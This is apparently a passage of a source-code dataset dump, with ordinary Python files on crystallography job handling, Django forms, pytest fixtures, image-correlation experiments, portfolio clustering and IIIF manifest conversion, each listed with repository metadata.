process them using the existing statistical maps # (this will be quicker than the original analysis). It will then merge the results of the two analyses. # # 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal. # modulo gives remainder after integer division # if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh': # source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n') # elif os.getenv('SHELL') == '/bin/bash' or self.use_remote: # source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n' # source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n') # else: # source_file='' # v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4 # 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete # source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n' # note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017) # #>>> for testing # self.submit_mode='local machine' # handles remote submission of pandda.analyse jobs # 1.) prepare output directory # 2.) go through project directory and make sure that all pdb files really exist # broken links derail the giant.cluster_mtzs_and_pdbs script # 3.) giant.cluster_mtzs_and_pdbs # os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)) # 4.) analyse output # 5.) update datasource # 6.) finish # reasons why pandda cannot be run # - there is currently a job running in the pandda directory # - min datasets available is too low # - required input paramters are not complete # - map amplitude and phase labels don't exist # remove exisiting mtz file # event maps generated with pandda v0.2 or higher have the same symmetry as the crystal # but phenix.map_to_structure_facors only accepts maps in spg P1 # therefore map is first expanded to full unit cell and spg of map then set tp p1 # other conversion option like cinvfft give for whatever reason uninterpretable maps # run phenix.map_to_structure_factors # check if output files exist # update datasource with event_map_mtz information # see also: # http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model # program complains if resolution is 1.2 or higher # mtzin is usually refine.mtz # now need to check if there is a unassigned entry in panddaTable that is close | 2.021227 | 2 |
OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 0 | 8027 | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
class PerfilForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'first_name',
'last_name',
'celular',
)
labels = {
'first_name': _('Name'),
'last_name': _('Last Name'),
'celular': _('Mobile Phone'),
}
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control'}),
'last_name': forms.TextInput(attrs={'class': 'form-control'}),
'celular': forms.TextInput(attrs={'class': 'form-control'}),
}
class PersonaChangeForm(UserChangeForm):
"""for something will be
"""
class Meta(UserChangeForm.Meta):
model = PyUser
fields = (
'email',
'is_superuser',
'is_staff',
'is_active',
'last_login',
'date_joined',
'first_name',
'last_name',
)
# ========================================================================== #
class PasswordRecoveryForm(forms.ModelForm):
"""To send the account recovery correction
"""
class Meta():
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
# ========================================================================== #
class PasswordSetForm(forms.Form):
"""To send the account recovery correction
"""
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Password')}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Retype password')}
)
)
def clean(self):
super().clean()
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
print('entre8888')
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
class PersonaCreationForm(UserCreationForm):
"""This form class renders the record sheet of
users
"""
class Meta(UserCreationForm.Meta):
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
class AvatarForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'avatar',
)
class InitForm(forms.ModelForm):
"""From of OMegaERP initializacion
"""
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
'placeholder': _('Admin email')
}
)
)
password = forms.CharField(
max_length=100,
widget=forms.PasswordInput(
attrs={
'placeholder': _('Admin Password')
}
)
)
class Meta:
model = PyCompany
fields = [
'name',
'country',
'email',
'password'
]
labels = {
'name': _('Company Name'),
'country': _('Country'),
'email': _('Admin user email'),
'password': _('Password'),
}
widgets = {
'name': forms.TextInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Company Name'),
'style': 'width: 100%',
},
),
'country': autocomplete.ModelSelect2(
url='PyCountry:autocomplete',
attrs={
'class': 'form-control',
'data-placeholder': _('Select a country...'),
'style': 'width: 100%',
},
),
'email': forms.EmailInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Admin user email'),
'style': 'width: 100%',
},
),
}
class ActivateForm(forms.Form):
"""To activate or deactivate an object in OmegaERP
"""
object_name = forms.CharField(max_length=100, widget=forms.HiddenInput)
object_pk = forms.IntegerField(widget=forms.HiddenInput) | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
class PerfilForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'first_name',
'last_name',
'celular',
)
labels = {
'first_name': _('Name'),
'last_name': _('Last Name'),
'celular': _('Mobile Phone'),
}
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control'}),
'last_name': forms.TextInput(attrs={'class': 'form-control'}),
'celular': forms.TextInput(attrs={'class': 'form-control'}),
}
class PersonaChangeForm(UserChangeForm):
"""for something will be
"""
class Meta(UserChangeForm.Meta):
model = PyUser
fields = (
'email',
'is_superuser',
'is_staff',
'is_active',
'last_login',
'date_joined',
'first_name',
'last_name',
)
# ========================================================================== #
class PasswordRecoveryForm(forms.ModelForm):
"""To send the account recovery correction
"""
class Meta():
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
# ========================================================================== #
class PasswordSetForm(forms.Form):
"""To send the account recovery correction
"""
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Password')}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Retype password')}
)
)
def clean(self):
super().clean()
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
print('entre8888')
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
class PersonaCreationForm(UserCreationForm):
"""This form class renders the record sheet of
users
"""
class Meta(UserCreationForm.Meta):
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
class AvatarForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'avatar',
)
class InitForm(forms.ModelForm):
"""From of OMegaERP initializacion
"""
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
'placeholder': _('Admin email')
}
)
)
password = forms.CharField(
max_length=100,
widget=forms.PasswordInput(
attrs={
'placeholder': _('Admin Password')
}
)
)
class Meta:
model = PyCompany
fields = [
'name',
'country',
'email',
'password'
]
labels = {
'name': _('Company Name'),
'country': _('Country'),
'email': _('Admin user email'),
'password': _('Password'),
}
widgets = {
'name': forms.TextInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Company Name'),
'style': 'width: 100%',
},
),
'country': autocomplete.ModelSelect2(
url='PyCountry:autocomplete',
attrs={
'class': 'form-control',
'data-placeholder': _('Select a country...'),
'style': 'width: 100%',
},
),
'email': forms.EmailInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Admin user email'),
'style': 'width: 100%',
},
),
}
class ActivateForm(forms.Form):
"""To activate or deactivate an object in OmegaERP
"""
object_name = forms.CharField(max_length=100, widget=forms.HiddenInput)
object_pk = forms.IntegerField(widget=forms.HiddenInput) | en | 0.688546 | # -*- coding: utf-8 -*- Global app forms # Standard Library # Django Library # Thirdparty Library # Localfolder Library Class to update the user profile on the system for something will be # ========================================================================== # To send the account recovery correction # ========================================================================== # To send the account recovery correction This form class renders the record sheet of users Class to update the user profile on the system From of OMegaERP initializacion To activate or deactivate an object in OmegaERP | 2.02492 | 2 |
test-drf-project/tests/conftest.py | fvlima/drf-view-profiler | 30 | 8028 | from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def mock_http_request():
http_request = HttpRequest()
http_request.method = "GET"
return http_request
@pytest.fixture
def mock_http_response(mock_http_request):
response = Response()
mock_http_request.line_profiler = mock.Mock()
mock_http_request.parser_context = {"view": mock.Mock()}
response.renderer_context = {"request": mock_http_request}
return response
@pytest.fixture
def mock_output_writer(monkeypatch):
mock_output_writer_ = mock.Mock()
monkeypatch.setattr("drf_viewset_profiler.middleware.output_writer.stream", mock_output_writer_)
return mock_output_writer_
@pytest.fixture
def mock_line_profiler_viewset_middleware():
return LineProfilerViewSetMiddleware()
| from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def mock_http_request():
http_request = HttpRequest()
http_request.method = "GET"
return http_request
@pytest.fixture
def mock_http_response(mock_http_request):
response = Response()
mock_http_request.line_profiler = mock.Mock()
mock_http_request.parser_context = {"view": mock.Mock()}
response.renderer_context = {"request": mock_http_request}
return response
@pytest.fixture
def mock_output_writer(monkeypatch):
mock_output_writer_ = mock.Mock()
monkeypatch.setattr("drf_viewset_profiler.middleware.output_writer.stream", mock_output_writer_)
return mock_output_writer_
@pytest.fixture
def mock_line_profiler_viewset_middleware():
return LineProfilerViewSetMiddleware()
| none | 1 | 2.198992 | 2 |
|
Examples/VirtualLab/virtual_experiment_f.py | diehlpk/muDIC | 70 | 8029 | # This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| # This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| en | 0.906513 | # This allows for running the example when the repo has been cloned # Example code follows This example case runs an experiment where a deformation gradient is used to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four and sensor artifacts are included. The analysis is then performed and the resulting deformation gradient field is compared to the one used to deform the images # Set the amount of info printed to terminal during analysis # Define the image you want to analyse # Make a speckle image # Make an image deformed # Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities # Make a noise injector producing 2% gaussian additive noise # Make an synthetic image generation pipeline # Put it into an image stack # Now, make a mesh. Make sure to use enough elements #mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI # Prepare the analysis input and initiate the analysis # Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4. # We will now compare the results from the analysis to the deformation gradient which the image was deformed by #line1 = ax1.plot(res_field[:, 50], label="correct") | 2.461902 | 2 |
src/template_config.py | ckaestne/toxicity-detector | 7 | 8030 | <filename>src/template_config.py
mongo = { "user": "", "passwd": "", "db": "ghtorrent" }
perspective_api_key = ""
| <filename>src/template_config.py
mongo = { "user": "", "passwd": "", "db": "ghtorrent" }
perspective_api_key = ""
| none | 1 | 1.138955 | 1 |
|
tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 1 | 8031 | <filename>tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py<gh_stars>1-10
from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_column_headers(database):
expected_subset = {"row_number", "awarding_office_code"}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| <filename>tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py<gh_stars>1-10
from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_column_headers(database):
expected_subset = {"row_number", "awarding_office_code"}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| en | 0.855806 | AwardingOfficeCode must be six characters long. AwardingOfficeCode must be six characters long. | 2.407259 | 2 |
Optimisation Portfolios/HERC.py | BrandonAFong/Ideas | 0 | 8032 | <reponame>BrandonAFong/Ideas<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
def intersection(list1, list2):
intersec = [set(list1) & set(list2)]
return intersec
def compute_allocation(covar, clusters,Z,dimensions):
numClusters = len(clusters)
aWeights = np.array([1.] * len(covar))
cWeights = np.array([1.] * numClusters)
cVar = np.array([0.] * numClusters)
for i, cluster in clusters.items():
cluster_covar = covar[cluster, :][:, cluster]
inv_diag = 1 / np.diag(cluster_covar)
aWeights[cluster] = inv_diag / np.sum(inv_diag)
for i, cluster in clusters.items():
weights = aWeights[cluster]
cVar[i - 1] = np.dot(
weights, np.dot(covar[cluster, :][:, cluster], weights))
for m in range(numClusters - 1):
left = int(Z[dimensions - 2 - m, 0])
lc = seriation(Z, dimensions, left)
right = int(Z[dimensions - 2 - m, 1])
rc = seriation(Z, dimensions, right)
id_lc = []
id_rc = []
for i, cluster in clusters.items():
if sorted(intersection(lc, cluster)) == sorted(cluster):
id_lc.append(i)
if sorted(intersection(rc, cluster)) == sorted(cluster):
id_rc.append(i)
id_lc = np.array(id_lc) - 1
id_rc = np.array(id_rc) - 1
alpha = 0
lcVar = np.sum(cVar[id_lc])
rcVar = np.sum(cVar[id_rc])
alpha = lcVar / (lcVar + rcVar)
cWeights[id_lc] = cWeights[
id_lc] * alpha
cWeights[id_rc] = cWeights[
id_rc] * (1 - alpha)
for i, cluster in clusters.items():
aWeights[cluster] = aWeights[cluster] * cWeights[
i - 1]
return aWeights
#Dataframe of returns
def HERC(mat_ret):
#Need to first calculate the optimal number of clusters
#The mat_ret that goes into this must be a np array of returns
# correl_mat = mat_ret.corr(method='pearson')
column_dic = {k:v for v, k in enumerate(mat_ret.columns)}
correl_mat = df_to_matrix(mat_ret.corr(method='pearson'))
dist = 1 - correl_mat
dim = len(dist)
tri_a, tri_b = np.triu_indices(dim, k = 1)
Z = fastcluster.linkage(dist[tri_a, tri_b], method='ward')
optimalK = OptimalK(parallel_backend = 'rust')
n_clusters = optimalK(mat_ret.values, cluster_array = np.arange(1,len(mat_ret)))
nb_clusters = n_clusters
clustering_inds = fcluster(Z, nb_clusters, criterion='maxclust')
clusters = {i: [] for i in range(min(clustering_inds),max(clustering_inds) + 1)}
for i, v in enumerate(clustering_inds):
clusters[v].append(i)
HERC_w = compute_allocation(correl_mat, clusters, Z, dim)
HERC_w = pd.Series(HERC_w)
my_inverted_dict = dict(map(reversed, column_dic.items()))
HERC_w = HERC_w.rename(index = my_inverted_dict)
return HERC_w
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
def intersection(list1, list2):
intersec = [set(list1) & set(list2)]
return intersec
def compute_allocation(covar, clusters,Z,dimensions):
numClusters = len(clusters)
aWeights = np.array([1.] * len(covar))
cWeights = np.array([1.] * numClusters)
cVar = np.array([0.] * numClusters)
for i, cluster in clusters.items():
cluster_covar = covar[cluster, :][:, cluster]
inv_diag = 1 / np.diag(cluster_covar)
aWeights[cluster] = inv_diag / np.sum(inv_diag)
for i, cluster in clusters.items():
weights = aWeights[cluster]
cVar[i - 1] = np.dot(
weights, np.dot(covar[cluster, :][:, cluster], weights))
for m in range(numClusters - 1):
left = int(Z[dimensions - 2 - m, 0])
lc = seriation(Z, dimensions, left)
right = int(Z[dimensions - 2 - m, 1])
rc = seriation(Z, dimensions, right)
id_lc = []
id_rc = []
for i, cluster in clusters.items():
if sorted(intersection(lc, cluster)) == sorted(cluster):
id_lc.append(i)
if sorted(intersection(rc, cluster)) == sorted(cluster):
id_rc.append(i)
id_lc = np.array(id_lc) - 1
id_rc = np.array(id_rc) - 1
alpha = 0
lcVar = np.sum(cVar[id_lc])
rcVar = np.sum(cVar[id_rc])
alpha = lcVar / (lcVar + rcVar)
cWeights[id_lc] = cWeights[
id_lc] * alpha
cWeights[id_rc] = cWeights[
id_rc] * (1 - alpha)
for i, cluster in clusters.items():
aWeights[cluster] = aWeights[cluster] * cWeights[
i - 1]
return aWeights
#Dataframe of returns
def HERC(mat_ret):
#Need to first calculate the optimal number of clusters
#The mat_ret that goes into this must be a np array of returns
# correl_mat = mat_ret.corr(method='pearson')
column_dic = {k:v for v, k in enumerate(mat_ret.columns)}
correl_mat = df_to_matrix(mat_ret.corr(method='pearson'))
dist = 1 - correl_mat
dim = len(dist)
tri_a, tri_b = np.triu_indices(dim, k = 1)
Z = fastcluster.linkage(dist[tri_a, tri_b], method='ward')
optimalK = OptimalK(parallel_backend = 'rust')
n_clusters = optimalK(mat_ret.values, cluster_array = np.arange(1,len(mat_ret)))
nb_clusters = n_clusters
clustering_inds = fcluster(Z, nb_clusters, criterion='maxclust')
clusters = {i: [] for i in range(min(clustering_inds),max(clustering_inds) + 1)}
for i, v in enumerate(clustering_inds):
clusters[v].append(i)
HERC_w = compute_allocation(correl_mat, clusters, Z, dim)
HERC_w = pd.Series(HERC_w)
my_inverted_dict = dict(map(reversed, column_dic.items()))
HERC_w = HERC_w.rename(index = my_inverted_dict)
return HERC_w | en | 0.613924 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- Created on Tue Aug 31 22:48:21 2021 @author: apple #HERC #Dataframe of returns #Need to first calculate the optimal number of clusters #The mat_ret that goes into this must be a np array of returns # correl_mat = mat_ret.corr(method='pearson') | 2.066397 | 2 |
src/conv/convertManifest2Curation.py | nakamura196/i3 | 3 | 8033 | import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
| import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
